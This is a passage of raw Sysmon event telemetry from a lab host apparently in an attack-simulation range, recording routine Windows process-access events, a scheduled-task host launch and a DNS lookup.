STEM32\ntdll.dll+6ced1 10341000x8000000000000000361167Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\SYSTEM32\CSRSRV.dll+1430|C:\Windows\SYSTEM32\CSRSRV.dll+5fd9|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361166Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.269{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361165Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.269{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5b3d3|C:\Windows\System32\KERNEL32.DLL+1c9af|c:\windows\system32\rpcss.dll+11b06|c:\windows\system32\rpcss.dll+5966|c:\windows\system32\rpcss.dll+56f6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361164Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.254{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8802-000000001100}2852C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+17436|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361163Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.254{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8802-000000001100}2852C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2f97f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361162Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.254{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2500-000000001100}2032C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361161Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.254{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0e00-000000001100}712C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361160Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.254{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2500-000000001100}2032C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361159Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.254{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2500-000000001100}2032C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361158Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.238{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361157Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.238{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361156Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.238{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361155Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.238{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361154Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.242{8e433fbf-36ff-6013-a703-000000001100}2400C:\Windows\System32\taskhostw.exe10.0.18362.387 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe -RegisterUserDevice -NewAccountC:\Windows\system32\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=8AC325C757FA721B272ECEA19EBCF745,SHA256=0BEC3128B241FA533DC5A9D3F62AA41323D205DEFC30DCDE228C5ECC2D1E50A9,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule 10341000x8000000000000000361153Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.238{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ec7a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361152Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.238{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ec7a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 22542200x8000000000000000361259Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.150{8e433fbf-337a-6013-7602-000000001100}6288cdn.onenote.net0type: 5 cdn.onenote.net.edgekey.net;type: 5 e1553.dspg.akamaiedge.net;::ffff:104.65.189.242;C:\Windows\System32\svchost.exe 10341000x8000000000000000361258Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:20.082{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+99dd|C:\Windows\System32\windows.storage.dll+97ed|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed|C:\Windows\System32\user32.dll+15de2|C:\Windows\System32\shcore.dll+cbfc 10341000x8000000000000000361257Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:20.082{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+ae4a|C:\Windows\System32\windows.storage.dll+ad70|C:\Windows\System32\windows.storage.dll+a876|C:\Windows\System32\windows.storage.dll+9957|C:\Windows\System32\windows.storage.dll+97ed|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d 10341000x8000000000000000361256Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:20.004{8e433fbf-36ff-6013-ae03-000000001100}86285796C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\RuntimeBroker.exe+3a5b|C:\Windows\System32\RuntimeBroker.exe+38be|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361260Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:23.645{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361269Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361268Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361267Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361266Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361265Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361264Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361263Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361262Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361261Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:24.317{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 